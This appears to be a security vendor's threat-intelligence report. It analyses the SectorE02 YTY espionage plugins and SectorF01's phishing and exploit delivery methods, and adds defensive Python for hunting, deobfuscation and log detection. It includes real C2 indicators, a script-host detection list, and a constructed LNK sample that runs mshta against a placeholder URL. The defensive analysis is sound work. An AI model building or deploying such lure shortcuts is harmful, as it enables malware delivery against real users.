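    """Return (indicator, detail) tuples; an empty list means nothing found."""
    findings = []
    base = Path(userprofile)
    for rel in STAGING_DIRS:
        folder = base / _to_local(rel)
        if not folder.is_dir():
            continue
        findings.append(("staging_dir", str(folder)))
        win_txt = folder / "win.txt"
        if win_txt.is_file():
            first = win_txt.read_text(errors="replace").splitlines()[:1]
            if first and VICTIM_ID_RE.match(first[0].strip()):
                findings.append(("victim_id_file", first[0].strip()))
    for name, target in run_values.items():
        # Match on the value names the script uses OR on the path it points to,
        # since either may change between campaigns.
        if name in RUN_VALUE_NAMES or "\\drivedata\\" in target.lower():
            findings.append(("run_key", f"{name} -> {target}"))
    return findings


def make_sample_profile():
    """Build a constructed 'infected' profile in a temp dir and return
    (profile_path, run_values) as a live host would present them."""
    root = tempfile.mkdtemp()
    files_dir = Path(root) / "DriveData" / "Files"
    files_dir.mkdir(parents=True)
    (files_dir / "win.txt").write_text("DESKTOP-AB12-4821 \n")
    run_values = {
        "Files": r"C:\Users\victim\DriveData\Wins\juchek.exe",                          # malicious
        "OneDrive": r"C:\Users\victim\AppData\Local\Microsoft\OneDrive\OneDrive.exe",  # benign
    }
    return root, run_values


if __name__ == "__main__":
    profile, values = make_sample_profile()
    for indicator, detail in hunt_yty_stager(profile, values):
        print(f"{indicator:15} {detail}")
```

Because the plugins are rebuilt per campaign, the folder names and Run value names are the most stable thing to key on; the hidden+system attribute combination on a folder directly under the profile root is a useful secondary signal on Windows (os.stat().st_file_attributes) that this cross-platform version omits.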

Downloader (b874a158f019dc082a0069eb3f7e169fbec2b4f05b123eed62d81776a7ddb384)

Looking at the latest downloader executable, whose filename masquerades as an InPage document (bgfRdstr54sf.inp), it starts by calling CreateEventA with the name “ab567” as a mutex, and it only runs if the file %USERPROFILE%\DriveData\Files\win.txt exists. It polls the C2 server roughly every 100 seconds, using the fixed user agent string “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0”, and performs an HTTPS GET against servicejobs[.]life/orderme/<computername>-<random>.

This is a change from their previous URL structure, a plain “/orderme” path that contained the file(s) to be downloaded. The per-victim path lets them cherry-pick their victims: unless the SectorE02 operator specifically places the next stage malware in the server directory for a particular victim, that victim will only ever be infected with the downloader.

The downloader accepts three commands from the server, selected by the Content-Type header of the response: “Content-Type: application”, “Content-Type: cmdline”, or “Content-Type: batcmd”. These are used to save a file to disk or to execute a file or command on the system, and this is how the next stage downloader or plugins are executed on the victim system.

Screenshot Plugin (f10f41bd38832596d4c449f81b9eb4129361aa4e4ebd4a8e8d2d8bf388934ca5)

This executable plugin takes a screenshot every two minutes, using the Windows API to draw the raw screen bitmap into a file in the common exfiltration folder, %USERPROFILE%\Print\Network\Server\. It then converts this raw bitmap to a JPG in a new file and deletes the raw bitmap file.

Code in the screenshot plugin creating the raw bitmap

The screenshot files are named in the format “tm_hour-tm_min-tm_sec-tm_year-tm_mday-tm_mon”, i.e. the fields of the C runtime’s struct tm [1]. When reconstructing capture times from these names, keep in mind that if the raw fields are written, tm_year counts years since 1900 and tm_mon runs from 0 to 11 [1].

Screenshot JPGs created by the screenshot plugin

Like some of the other YTY components, the obfuscated strings can be recovered by applying base64 decoding and string reversal multiple times (in this case, three times).

The strings can be deobfuscated by running both the base64 and reverse algorithm three times
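As an added example (not code from the post or from the YTY plugin), here is the string recovery routine written out. The post says both operations are applied three times; the order assumed here is "base64-decode, then reverse" on each round, undoing "reverse, then base64-encode" on the attacker side, with a reverse_first switch for the other order should a sample turn out to use it. obfuscate() exists only to build test vectors, and peel() is an added convenience for samples where the round count is not yet known.

```python
"""Recovers YTY plugin strings protected with repeated base64 + reversal."""
import base64
import binascii


def obfuscate(plain: str, rounds: int = 3) -> str:
    """Attacker-side transform, used here only to construct samples."""
    data = plain.encode()
    for _ in range(rounds):
        data = base64.b64encode(data[::-1])   # reverse, then encode
    return data.decode()


def deobfuscate(blob: str, rounds: int = 3, reverse_first: bool = False) -> str:
    """Undo `rounds` layers. Default order: base64-decode, then reverse."""
    data = blob.encode()
    for _ in range(rounds):
        if reverse_first:
            data = base64.b64decode(data[::-1], validate=True)
        else:
            data = base64.b64decode(data, validate=True)[::-1]
    return data.decode(errors="replace")


def peel(blob: str, max_rounds: int = 8) -> list:
    """Decode-and-reverse until the result is no longer valid base64 and
    return every layer seen. Heuristic: a plaintext whose length happens to
    be a multiple of 4 and uses only base64 characters would decode one
    layer too far, so eyeball the last layers."""
    layers = [blob]
    data = blob.encode()
    for _ in range(max_rounds):
        try:
            data = base64.b64decode(data, validate=True)[::-1]
        except (binascii.Error, ValueError):
            break
        layers.append(data.decode(errors="replace"))
    return layers


if __name__ == "__main__":
    # Constructed sample: the common exfiltration folder name, three layers deep.
    sample = obfuscate(r"%USERPROFILE%\Print\Network\Server")
    print(sample)
    for i, layer in enumerate(peel(sample)):
        print(i, layer)
```

A hand-checkable vector: "ab" becomes "YmE=" after one layer, "PUVtWQ==" after two and "PT1RV3RWVVA=" after three, so a string in a sample that decodes to something starting with padding characters ("==") is a strong hint that another reversal is still pending.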

File Listing Plugin (d71a1d993e9515ec69a32f913c2a18f14cdb52ef06e4011c8622b5945440c1aa)

This executable plugin recursively searches the “C:”, “D:”, “E:”, “F:”, “G:”, and “H:” drives for files with the extensions shown below. Several default folders are skipped by the malware.

Note that the “.inp” extension belongs to “Urdu InPage”, a word processing program that supports languages such as Urdu, the national language of Pakistan. The extensions that the earlier 2019 version of this plugin did not look for are “.odt” and “.eml”, and “.rft” is simply a misspelling of “.rtf” on the authors’ part.

The latest version of the plugin looks for files with any of 14 different file extensions

It only looks for files modified after 2017 and records each matching file in %APPDATA%\DriveData\Files\clist.log using the format “File Path|Size WriteTimestamp l_flag”.

File path and names for exfiltration are saved to a clist.log file

Copies of these matching files are also saved to the common exfiltration folder, %USERPROFILE%\Print\Network\Server\. Each copy is named after the full path of the original file, with the slashes replaced by underscores.

Exact copies of the files the plugin is looking for are saved to the common exfiltration folder

Keylogger Plugin (f331f67baa2650c426daae9dee6066029beb8b17253f26ad9ebbd3a64b2b6a37)

This plugin starts by calling CreateEventA with the name “k4351” as a mutex. It records user keystrokes, together with the title of the window they were typed into, in the common exfiltration folder, %USERPROFILE%\Print\Network\Server\. The file is saved as “<username>_YYYY_MM_DD(HH_mm_ss).txt”.

Example of input captured by the keylogger plugin

Uploader Plugin (d4e587b16fbc486a62cc33febd5438be3a9690afc1650af702ed42d00ebfd39e)

This plugin starts by calling CreateEventA with the name “MyEvent3525” as a mutex, and it only runs if the file %USERPROFILE%\DriveData\Files\win.txt exists. While the other plugins dump their files into the common exfiltration folder, the uploader plugin takes the files from that folder and uploads them to the C2 server, which is the same server the downloader uses. The uploaded files are deleted immediately afterwards.

The uploader performs an HTTP POST of each file to /upload/<computername> as an HTTP form upload, with the same hard coded user agent as the downloader, “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0”.

Data sent to the C2 server through HTTPS for exfiltration
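The downloader beacon and the uploader POST described above share a hard-coded user agent and a predictable path shape, which is enough for a proxy-log detection. The script below is an added example, not NSHC's detection content; the log format it parses (method, host, path and user agent separated by " | ") and the sample lines are constructed for the example, so the parser is the part to adapt to your own proxy. The C2 domains come from the IoC list further down, written undefanged here for matching.

```python
"""Detection logic for the YTY downloader/uploader beacons over proxy logs.
Matches the hard-coded Firefox 52 user agent together with the per-victim
paths /orderme/<computername>-<random> (downloader GET) and
/upload/<computername> (uploader POST)."""
import re
from dataclasses import dataclass

YTY_USER_AGENT = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
KNOWN_C2 = {"servicejobs.life", "data-backup.online"}   # domains from the IoC list
ORDERME_RE = re.compile(r"^/orderme/([A-Za-z0-9_.-]+)-(\d{1,5})$")
UPLOAD_RE = re.compile(r"^/upload/([A-Za-z0-9_.-]+)$")


@dataclass
class Hit:
    line_no: int
    stage: str          # "downloader" or "uploader"
    computername: str
    host: str
    confidence: str     # "high" if the host is a known C2, else "medium"


def parse_line(line: str):
    """Assumed log layout: 'METHOD | host | path | user-agent'."""
    parts = [p.strip() for p in line.split(" | ")]
    if len(parts) != 4:
        return None
    method, host, path, ua = parts
    return method.upper(), host.lower(), path, ua


def scan_proxy_log(lines) -> list:
    hits = []
    for n, line in enumerate(lines, 1):
        parsed = parse_line(line)
        if not parsed:
            continue
        method, host, path, ua = parsed
        if ua != YTY_USER_AGENT:
            continue   # the UA alone is not enough; real Firefox 52 ESR traffic exists
        m = ORDERME_RE.match(path)
        if m and method == "GET":
            stage, name = "downloader", m.group(1)
        else:
            m = UPLOAD_RE.match(path)
            if m and method == "POST":
                stage, name = "uploader", m.group(1)
            else:
                continue
        conf = "high" if host in KNOWN_C2 else "medium"
        hits.append(Hit(n, stage, name, host, conf))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    "GET | servicejobs.life | /orderme/DESKTOP-AB12-4821 | " + YTY_USER_AGENT,
    "GET | www.mozilla.org | /en-US/firefox/ | " + YTY_USER_AGENT,
    "POST | servicejobs.life | /upload/DESKTOP-AB12 | " + YTY_USER_AGENT,
    "GET | example.net | /orderme/HOST-1 | Mozilla/5.0 (X11; Linux x86_64) Firefox/68.0",
    "GET | unknown.example | /orderme/LAPTOP-7-99 | " + YTY_USER_AGENT,
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit)
```

Matching on path shape plus user agent, with the domain only raising confidence, is deliberate: the group has already changed domains and URL layout once, while the beacon's shape and the hard-coded UA survived the rewrite.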

Summary

While the use of a modular framework is not a new concept, the SectorE02 group’s continuous rewriting of YTY framework plugins that serve the same purpose allows them to keep detections by security tools at a minimum. Based on their campaigns and the plugins we have seen, we believe they may be recreating each plugin on a per-campaign basis, meaning that each campaign may use new binaries coded from scratch that are rarely detected by security tools. At the same time, their newfound caution in protecting their binaries from being downloaded, together with their limited targeting, means that the hardest part of detecting and responding to the SectorE02 group may be finding their binaries in the first place.

Indicators of Compromise

Malicious Excel Files (SHA-256)

Dropped Batch Scripts (SHA-256)

92b12010772166647f510ad91731e931d58bc077bfc9f9d39adc678cc00fb65d
1b46735d6b6aebefd5809274de1aaa56b5fac314b33c2fa51b001e07b4f7e4d7
57a9a17baaf61de5cffa8b2e2ec340a179e7e1cd70e046cbd832655c44bc7c1d
cd03ed9e4f3257836e11016294c8701baa12414b59f221e556cbed16a946b205
ce1df70e96b4780329d393ff7a37513aec222030e80606ee3ef99b306951d74d
9169dab8579d49253f72439f7572e0aabeb685c5ca63bf91fff81502764e79bb

Dropped YTY Downloaders (SHA-256)

5acfd1b49ae86ef66b94a3e0209a2d2a3592c31b57ccbaa4bb9540fcf3403574
08b11f246e2ebcfc049f198c055fc855e0af1f8499ba18791e3232efa913b01a
62dfec7fe0025e8863c2252abb4ec1abdb4b916b76972910c6a47728bfb648a7
13f27543d03fd4bee3267bdc37300e578994f55edabc031de936ff476482ceb4
b874a158f019dc082a0069eb3f7e169fbec2b4f05b123eed62d81776a7ddb384
e726c07f3422aaee45187bae9edb1772146ccac50315264b86820db77b42b31c

YTY File Plugin

8fff7f07ebf0a1e0a4eabdcf57744739f39de643d831c36416b663bd243590e1
d71a1d993e9515ec69a32f913c2a18f14cdb52ef06e4011c8622b5945440c1aa

YTY Screenshot Plugin

f10f41bd38832596d4c449f81b9eb4129361aa4e4ebd4a8e8d2d8bf388934ca5

YTY Keylogger Plugin

f331f67baa2650c426daae9dee6066029beb8b17253f26ad9ebbd3a64b2b6a37

YTY File Exfiltration Uploader Plugin

d4e587b16fbc486a62cc33febd5438be3a9690afc1650af702ed42d00ebfd39e

IP Addresses

179[.]43[.]170[.]155
5[.]135[.]199[.]26

Domains

data-backup[.]online
servicejobs[.]life

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK techniques we observed in our analysis of this malware.

Initial Access

T1193 Spearphishing Attachment

Execution

T1059 Command-Line Interface
T1053 Scheduled Task
T1064 Scripting
T1204 User Execution

Persistence

T1158 Hidden Files and Directories
T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task

Defense Evasion

T1140 Deobfuscate/Decode Files or Information
T1107 File Deletion
T1158 Hidden Files and Directories
T1066 Indicator Removal from Tools
T1112 Modify Registry
T1027 Obfuscated Files or Information
T1064 Scripting

Credential Access

T1056 Input Capture

Discovery

T1010 Application Window Discovery
T1083 File and Directory Discovery
T1082 System Information Discovery
T1497 Virtualization/Sandbox Evasion

Collection

T1119 Automated Collection
T1005 Data from Local System
T1039 Data from Network Shared Drive
T1025 Data from Removable Media
T1074 Data Staged
T1114 Email Collection
T1056 Input Capture
T1113 Screen Capture

Command and Control

T1043 Commonly Used Port
T1071 Standard Application Layer Protocol

Exfiltration

T1020 Automated Exfiltration
T1041 Exfiltration Over Command and Control Channel

References

[1] Microsoft Docs | localtime, _localtime32, _localtime64
https://docs.microsoft.com/en-us/cpp/c-runtime-library/reference/localtime-localtime32-localtime64?view=vs-2019

The Growth of SectorF01 Group’s Cyber Espionage Activities

Abstract

Since 2013, a state-sponsored hacking group has been conducting cyber espionage campaigns against countries bordering the South China Sea. We refer to this group as SectorF01. Since 2017, their activities have increased significantly. They mainly carry out these campaigns against government agencies and diplomatic, military, and research institutions in neighboring countries, and conduct surveillance against opposition forces in their own country.

In recent years, the SectorF01 group has also engaged in cyber espionage against various industries for its own country’s benefit. They put extra focus on the automobile industry, and their target countries have expanded to include South Korea and Japan in East Asia. We took a step-by-step look at more than 800 malware samples used by the SectorF01 group from 2013 until now (H1 2019). In this post, we focus on the initial access methods the SectorF01 group uses against its targets. We will see that they love using DLL side-loading.

Targets

Target Countries

The SectorF01 group conducts cyber espionage mainly in Southeast Asia and East Asia. The victims are countries around the South China Sea, which belong to the Association of Southeast Asian Nations (ASEAN).

The SectorF01 group’s intensive attack targets are in the following countries:

• Vietnam
• China
• Cambodia
• Laos
• Thailand
• Myanmar
• Philippines
• Malaysia
• Indonesia
• Singapore

Recently, they have also been expanding their cyber espionage activities to the following countries in East Asia:

• Japan
• South Korea

Targets of the SectorF01 group

The ellipses marked with red dotted lines are the range of countries targeted by the SectorF01 group, and the dark red ellipses are the range of countries where the attack is more concentrated. The ellipses, marked with orange dotted lines, are a range of countries that have recently been included in the attack target as the SectorF01 group expands their activities.

Target Industries

The SectorF01 group conduct cyber espionage activities against various fields as follows:

• Vietnamese dissidents, journalists, and activists
• ASEAN-related organizations
• Government institutions
• Diplomatic institutions
• Military institutions
• Marine-related organizations: maritime organizations, marine research institutes, shipping companies, etc.
• Scientific research institutes
• Universities and educational institutions
• Foreign companies in Vietnam
• Automotive Industry

Statistics for Cyber Espionage Activities in SectorF01 Group

The SectorF01 group has seen steady annual growth since its emergence as a cyber espionage actor in 2013 and has become one of the most influential threat actor groups in Southeast Asia. We compiled statistics about their activities from the more than 800 malware executables that the SectorF01 group has used in attacks.

All of the roughly 800 samples used in these statistics are Windows executables. Polymorphic binaries produced when a sample runs in a sandbox, whose file hashes change on every run, are excluded; only the initial file is counted. Excluding such binaries, which are not themselves used in attacks, minimizes statistical errors and misinterpretation.

This graph aggregates the number of malware samples used in attacks by the SectorF01 group each year. The number of samples they use each year is steadily increasing.

The Growth of the SectorF01 group’s Malware

The following are statistics for the time of day and day of week at which the SectorF01 group compiled their malware. Having analyzed about seven years of the SectorF01 group’s cyber espionage activity, we conclude that they are highly likely to be a threat actor group sponsored by the Vietnamese government. We compiled statistics on compile times from the timestamps of about 500 binaries, after excluding those among the 800 considered to have modified timestamps.

Assuming that the SectorF01 group operates from Vietnam, we set the time zone to UTC+7 (Vietnam time) and built the statistics on that basis. Given that business hours in Vietnam are mainly 8:00 am to 5:00 pm, about 68% of the samples were compiled during Vietnamese business hours. Binaries were also rarely compiled at lunch time.

SectorF01 Group’s Malware Compile Time (UTC+7)

Next, we compiled statistics on the days of the week on which the SectorF01 group built binaries. The SectorF01 group built binaries on weekdays rather than weekends: about 86% of the malware was built on weekdays, and most binaries were produced on Mondays.

The days of the week that the SectorF01 group compiled their binaries

SectorF01 Group’s Initial Access Tactics

The SectorF01 group uses a variety of methods for initial access. They mainly deliver malware to the target as email attachments, and at other times infect specific targets through watering hole attacks on websites they visit. Here we describe the various initial access methods they have used.

Spearphishing Attachment & Spearphishing Link

The SectorF01 group usually delivers its malware through email attachments or links. The definitions of these techniques can be found in the MITRE ATT&CK framework.

“Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution.”
MITRE ATT&CK – T1193, Spearphishing Attachment


“Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.”
MITRE ATT&CK – T1192, Spearphishing Link


Below are the various ways the SectorF01 group sends malware through email attachments or links.

Delivery Method 1: How Executable Files are Delivered

(1.1) Executable file disguised as normal document file

The SectorF01 group uses an executable that masquerades as a normal document, such as a Word or PDF file, so that the user runs it believing it to be a document. They change the file icon to that of the document program, or add a document extension such as “.doc” or “.pdf” before the “.exe” extension, which causes the user to mistake the file for a document. These executables are usually compressed and delivered as email attachments.

(1.2) Malware disguised as normal program

The SectorF01 group names the malware after a normal program, such as a web browser installer (Firefox, Chrome) or an Adobe Flash browser plug-in installer. In addition, malware has been distributed disguised as a legitimate program used only in the target country.

Malware disguised as normal program installation file

(1.3) Malware using the “Space after Filename” technique

The SectorF01 group uses the “Space after Filename” technique to make an executable look like a normal document. A document extension such as “.doc” or “.docx” is inserted before the “.exe” extension, with a long run of spaces between them. Depending on the width of the filename column, the trailing “.exe” extension is pushed out of view by the spaces, and the user may mistake the executable for a document.

Executable file disguised as document file through “Space after Filename” technique

(1.4) Malware contained in RAR archive

The SectorF01 group mainly delivers its malicious executables and documents inside compressed archives. The compression formats they have used are RAR, ZIP and GZIP, though RAR is by far the most common.

Malware included in RAR archive

(1.5) SFXZIP autorun compressed file malware

The SectorF01 group also uses self-extracting (SFX) archive malware. They use the WinRAR program’s ability to generate SFX archives, but generate them in the ZIP compression format rather than RAR.

SFX compressed file creation method of ZIP compression format using WinRAR program
ZIP compression format SFX compressed file type malware

(1.6) Malware distribution method using HTA

The SectorF01 group uses HTA files to spread malware. HTA stands for Microsoft HTML Application and uses the “.hta” extension. A typical HTA file looks much like an HTML file, but it is run by a separate host program, “mshta.exe”, rather than by a web browser such as Internet Explorer. The SectorF01 group includes VBScript in the “.hta” file, and that VBScript drops the embedded malware or downloads additional malware. The advantage for the attacker is that while VBScript running in a web browser is restricted by the browser’s security controls, those controls do not apply when the VBScript is executed through an HTA file.

Malware delivered in the form of an HTA file
VBScript to generate malware contained in HTA file

(1.7) Malware distribution method using Shortcut (LNK)

The SectorF01 group uses shortcut (“.lnk”) files to spread malware. An LNK file can carry a command line, and the group configures the shortcut to run VBScript code through the “mshta.exe” program. The shortcut is delivered with an icon and extension disguised to look like a Word document. If the target mistakes the LNK file for a document and opens it, the VBScript runs and downloads and executes an additional malware file from a server.

The following is a malicious LNK file used by the SectorF01 group:

Malware delivered in the form of an LNK file
Malicious LNK files to download and run additional malware
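Added example, not a sample or code from the report: a small parser for the MS-SHLLINK format that pulls the target, arguments and icon out of a shortcut and applies heuristics matching the behaviour described above (script host target, URL or inline script in the arguments, borrowed document icon, minimized window). `build_lnk` constructs a minimal shortcut for the demonstration; the host name and URL in it are placeholders, not indicators from this campaign.

```python
import struct

LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7
# Signed Windows binaries that run a script, remote file or installer handed to them on the command line.
SCRIPT_HOSTS = {"mshta.exe", "msiexec.exe", "powershell.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe"}


def parse_lnk(data):
    """Parse the ShellLinkHeader and StringData of an MS-SHLLINK file; skip IDList, LinkInfo and ExtraData."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:            # IDListSize (2 bytes) + item IDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                      # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]

    def read_string():
        nonlocal pos
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        return raw.decode("utf-16-le" if width == 2 else "cp1252")

    info = {"flags": flags, "show_command": show_command}
    for bit, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                     (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                     (HAS_ICON_LOCATION, "icon_location")):
        info[key] = read_string() if flags & bit else None
    return info


def assess_lnk(info):
    """Heuristics for a shortcut that masquerades as a document but hands a payload to a script host."""
    findings = []
    target = (info["relative_path"] or "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = (info["arguments"] or "").lower()
    icon = (info["icon_location"] or "").lower()
    if target in SCRIPT_HOSTS:
        findings.append(f"target is a script/installer host: {target}")
    if any(k in args for k in ("http://", "https://", "vbscript:", "javascript:")):
        findings.append("arguments carry a URL or inline script")
    if target in SCRIPT_HOSTS and icon and not icon.endswith(target):
        findings.append(f"icon borrowed from another program: {icon}")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window opens minimized (SW_SHOWMINNOACTIVE), hiding the host's console")
    return findings


def build_lnk(relative_path, arguments, icon_location, show_command=1):
    """Constructed sample for this example: a minimal shortcut with one dummy IDList item and Unicode strings."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LINK_CLSID, flags, 0x20, 0, 0, 0, 0, 0,
                         show_command, 0, 0, 0, 0)
    id_list = struct.pack("<H", 5) + b"\x1f\x50\x00" + b"\x00\x00"   # one 5-byte item, then terminal ID
    body = struct.pack("<H", len(id_list)) + id_list

    def string_data(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    body += string_data(relative_path) + string_data(arguments) + string_data(icon_location)
    return header + body + struct.pack("<I", 0)   # terminal ExtraData block


if __name__ == "__main__":
    # Placeholder host and URL, not indicators from the report.
    sample = build_lnk(r"..\..\..\..\Windows\System32\mshta.exe",
                       "http://example.invalid/report.hta",
                       r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE", show_command=7)
    info = parse_lnk(sample)
    print(info["relative_path"], info["arguments"])
    for f in assess_lnk(info):
        print(" -", f)
```

Real shortcuts usually also carry an EnvironmentVariableDataBlock with the expanded target path; the parser above stops at the StringData, which is enough for the arguments and icon that these lures depend on.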

(1.8) Deliver malware download link using cloud service

The SectorF01 group uploads malware to Amazon AWS S3 and Dropbox cloud storage and delivers the download link by email.

Delivery Method 2: How malware is executed using macros

(2.1) Attacks using macros contained in a document

The SectorF01 group mainly delivers Word documents containing macros to the target. The document's filename is chosen to be something the target may be interested in, and the document is attached to the email. The victim is not infected unless the malicious macro runs, so the document body uses social engineering to persuade the user to enable macros.

Malicious Word document file with macros
Malicious macros contained in Word documents

(2.2) Attacks that convert macros to ActiveMime form

Word documents containing traditional malicious macros are more easily detected by security solutions such as antivirus and anti-spam filters. To get around this, the SectorF01 group also uses the ActiveMime format. ActiveMime is an undocumented Microsoft format that wraps the macro container of a Microsoft Office document. When a document containing a macro is saved as “.mht (Microsoft Web Archive)”, the macro is stored in the “.mht” file as a base64-encoded ActiveMime part. Macros converted this way can slip past security solutions that only inspect the usual OLE or OOXML containers; they are found only by decoding and analyzing the ActiveMime stream.

The SectorF01 group changed the extension of the malicious document which was converted to “.mht” file format to the “.doc” extension and attached it to the email and delivered it to the target.

MHT malware with ActiveMime masquerading as a DOC file
ActiveMime format with malicious macros
Word screen after opening a document whose macro was converted to ActiveMime
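Added example (written for this page, not the report's own tooling): check an attachment named “.doc” whose bytes are actually an MHT web archive, and locate any MIME part that decodes to an ActiveMime stream. The sample MHT is constructed; its ActiveMime part is the magic string plus filler, not a real macro container.

```python
import base64
import email
from email import policy

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .doc (Compound File)
ZIP_MAGIC = b"PK\x03\x04"                        # .docx (OOXML)
ACTIVEMIME_MAGIC = b"ActiveMime"                 # editdata.mso stream inside a saved MHT


def container_kind(data):
    """Classify a file claiming to be a Word document by its leading bytes."""
    head = data.lstrip(b"\r\n\t ")
    if head.startswith(OLE_MAGIC):
        return "ole2"
    if head.startswith(ZIP_MAGIC):
        return "ooxml-zip"
    if head.startswith(b"{\\rtf"):
        return "rtf"
    if head[:32].lower().startswith((b"mime-version:", b"from:", b"content-type:")):
        return "mht"
    return "unknown"


def find_activemime_parts(mht_bytes):
    """Walk the MIME parts of an MHT web archive and return those whose decoded body is ActiveMime."""
    msg = email.message_from_bytes(mht_bytes, policy=policy.default)
    found = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True) or b""   # undoes base64 / quoted-printable
        if payload.startswith(ACTIVEMIME_MAGIC):
            found.append({"content_type": part.get_content_type(),
                          "location": str(part.get("Content-Location", "")),
                          "size": len(payload)})
    return found


def assess_attachment(filename, data):
    """Findings for an e-mail attachment: extension/content mismatch and embedded ActiveMime streams."""
    kind = container_kind(data)
    ext = filename.rsplit(".", 1)[-1].lower()
    findings = []
    if ext in ("doc", "dot", "docx", "docm") and kind == "mht":
        findings.append(f"named .{ext} but the content is an MHT web archive")
    if kind == "mht":
        for p in find_activemime_parts(data):
            findings.append(f"ActiveMime stream {p['location']} ({p['size']} bytes) in {p['content_type']} part")
    return findings


def build_sample_mht():
    """Constructed sample: an MHT with an HTML body and one base64 application/x-mso part.
    The ActiveMime payload is a placeholder (magic plus filler), not a real macro container."""
    mso = base64.b64encode(ACTIVEMIME_MAGIC + b"\x00" * 22 + b"\xff\xff\xff\xff" + b"constructed-vba-blob").decode()
    return (
        "MIME-Version: 1.0\r\n"
        'Content-Type: multipart/related; boundary="----=_NextPart_01"\r\n'
        "\r\n"
        "------=_NextPart_01\r\n"
        "Content-Location: file:///C:/Users/user/Desktop/report.htm\r\n"
        'Content-Type: text/html; charset="us-ascii"\r\n'
        "\r\n"
        "<html><body><p>Please click Enable Content to view this document.</p></body></html>\r\n"
        "------=_NextPart_01\r\n"
        "Content-Location: file:///C:/Users/user/Desktop/report_files/editdata.mso\r\n"
        "Content-Transfer-Encoding: base64\r\n"
        "Content-Type: application/x-mso\r\n"
        "\r\n"
        f"{mso}\r\n"
        "------=_NextPart_01--\r\n"
    ).encode()


if __name__ == "__main__":
    sample = build_sample_mht()
    for finding in assess_attachment("Invitation.doc", sample):
        print(finding)
```

Word opens the renamed MHT without complaint because it sniffs the content rather than trusting the extension; a mail gateway that does the same sniffing, and then decodes the ActiveMime part before handing it to a macro scanner, closes the gap this trick relies on.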

Delivery Method 3: Deploy malware using vulnerabilities

The SectorF01 group exploits vulnerabilities that are in common use. Because these exploits are already used by many attackers, they mask the group's own characteristics to some extent.

(3.1) CVE-2017-0199

The CVE-2017-0199 vulnerability arises because Microsoft Office does not properly handle OLE objects. A malicious file such as an HTA (HTML Application) can be downloaded from a remote server and executed through the flaw in how MS Office processes a URL Moniker object.

The SectorF01 group used CVE-2017-0199 by delivering an RTF document containing a malicious OLE2link object to the target. The OLE2link object downloads a VBScript HTA file that contains the PowerShell command to run.

(3.2) CVE-2017-8570

The CVE-2017-8570 vulnerability likewise arises because Microsoft Office cannot properly handle OLE objects. The flaw lies in how MS Office handles Composite Moniker objects and allows an SCT (Windows Script Component) script included in an OLE package to be executed.

The SectorF01 group uses CVE-2017-8570 by delivering an RTF document containing a malicious “.sct” file that drops the malware.

Malicious documents using CVE-2017-8570 vulnerability

(3.3) CVE-2017-11882

The CVE-2017-11882 vulnerability is a memory corruption bug in the Equation Editor (EQNEDT32.EXE), a component of MS Office that fails to properly validate the objects it parses. While the Equation Editor is processing such an object in memory, an attacker can run arbitrary code through the vulnerability.

The SectorF01 group attacked by delivering a malicious RTF document with shellcode for generating malware using the CVE-2017-11882 vulnerability to the target.

Malicious documents using CVE-2017-11882 vulnerability
CVE-2017-11882 Vulnerability Code

(3.4) CVE-2018-20250

The CVE-2018-20250 vulnerability is in UNACEV2.dll, the library WinRAR uses to unpack the ACE format. By manipulating the filename field of an ACE entry, an attacker can make the archive write a file to a chosen path instead of the extraction directory. This lets the attacker drop an executable into a location where it runs automatically at logon, such as the Startup folder.

As many threat actor groups began to use CVE-2018-20250, the SectorF01 group did the same.

Malware using CVE-2018-20250 vulnerability

Delivery Method 4: Drive-by Compromise (Watering Hole)

The SectorF01 group infects targets that visit legitimate websites by compromising the site and inserting a malicious script, in order to steal account information or deliver malware. This is known as a Drive-by Compromise. Rather than hacking websites indiscriminately, the attackers choose sites that their specific targets visit frequently, which is why the attack is also called a watering hole attack.

